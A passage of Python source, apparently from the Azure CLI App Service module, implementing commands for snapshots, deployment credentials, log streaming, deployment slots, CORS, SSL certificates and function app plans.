return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=key_vault_certificate_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.keyvault._client_factory import keyvault_client_vaults_factory
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = keyvault_client_vaults_factory(cmd.cli_ctx, None)
vault = kv_client.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
if len(webapp_cert.host_names) == 1 and not webapp_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
webapp_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(webapp_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
KEYS = FUNCTIONS_STACKS_API_KEYS()
